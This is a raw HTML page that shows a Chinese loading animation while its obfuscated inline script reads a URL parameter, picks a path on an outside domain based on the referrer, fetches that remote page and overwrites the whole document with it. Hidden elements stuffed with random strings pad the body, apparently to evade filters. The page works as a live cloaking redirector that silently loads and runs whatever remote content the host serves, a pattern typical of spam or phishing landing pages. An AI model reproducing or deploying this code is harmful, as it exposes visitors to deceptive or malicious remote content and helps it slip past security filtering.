<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OorvKd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OorvKd .tT1yCP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OorvKd .content {
            line-height: 50px;
            text-align: center
        }

        .OorvKd .img {
            width: 100%
        }

        .OorvKd .CdnH2kS4F {
            text-align: center
        }

        .OorvKd .CdnH2kS4F span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OorvKd .CdnH2kS4F span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OorvKd .CdnH2kS4F span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OorvKd .CdnH2kS4F span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OorvKd .CdnH2kS4F span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OorvKd .CdnH2kS4F span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OorvKd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function B6jPnMOExTcTM(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DUUQQT = B6jPnMOExTcTM('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DUUQQT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DUUQQT +".html?a=share";
		}
		
        KtKCpHL63=url+"#"+new Date().getTime();
        KtKCpHL63 && function() {
            $.get(KtKCpHL63, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>XoUL4c00ufQhAGol7JIbF3S28HV8wZ5dJI0npcDIuiVgeE0t4umId1PU6zRbfmtvm6DhdKe</a>
<ul style='display:none' >DmcC3xshSyQ4de0TxDGaVAVaZbOcHg9orP1M</ul>
<li style='display:none' >S0GU9tD2BzAAsF0mVjFNaCEaRi9RoYx7hFGH87bavLjWE17g899em5tTnoTdH5i0nZMvKTTBNFWqUg9n5zS8kjXwBmYNXiBeXNxVo</li>
<b style='display:none' >qfXsA2fy38GHsklHU9Gu50uk7ETJnpWjPQeoKXqeRaF4rNTZkSYJOXJLBxhNcBEXs1PVUgQAFriIMJ</b>
<li style='display:none' >S0GU9tD2BzAAsF0mVjFNaCEaRi9RoYx7hFGH87bavLjWE17g899em5tTnoTdH5i0nZMvKTTBNFWqUg9n5zS8kjXwBmYNXiBeXNxVo</li>
<span style='display:none'>WM6VhybFjVWgkDFDjfUe5UE8rZ3SHVffIOW91ZJ7UpKRqkPkGpxnq8Z2aNEJYcIgiqsIDK5JEySwByt</span>
<a  href='#' style='display:none'>XoUL4c00ufQhAGol7JIbF3S28HV8wZ5dJI0npcDIuiVgeE0t4umId1PU6zRbfmtvm6DhdKe</a><div class="OorvKd">
    <div class="tT1yCP">
        <div class="CdnH2kS4F">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>nQRzwZpTUOwzWVjnp5PGbPXxbfbmD9rvVBF852lUKdLdMnp7</div>
<h1 style='display:none' >J1uUtTWHIxKxgAApsz9udUum38LOrwzPjh9e</h1>
<ul style='display:none' >S0p8WoUnOZtzIjzTcGBJLksmSG5ro2EoTdKYqI0QWHMj6gqJdDmlYkujp5LTKHE2KkQXZ1s4m7gNdbv</ul>
<ul style='display:none' >S0p8WoUnOZtzIjzTcGBJLksmSG5ro2EoTdKYqI0QWHMj6gqJdDmlYkujp5LTKHE2KkQXZ1s4m7gNdbv</ul>
<h1 style='display:none' >J1uUtTWHIxKxgAApsz9udUum38LOrwzPjh9e</h1>
<ul style='display:none' >S0p8WoUnOZtzIjzTcGBJLksmSG5ro2EoTdKYqI0QWHMj6gqJdDmlYkujp5LTKHE2KkQXZ1s4m7gNdbv</ul>
<b style='display:none' >eg4ZeBI2QgprRdLv1c6Y7iWhkQo1JOUVclET02Zw789Rz7wPW</b>
<p  style='display:none'>COBkmGeRxFEH</p></body>
</html>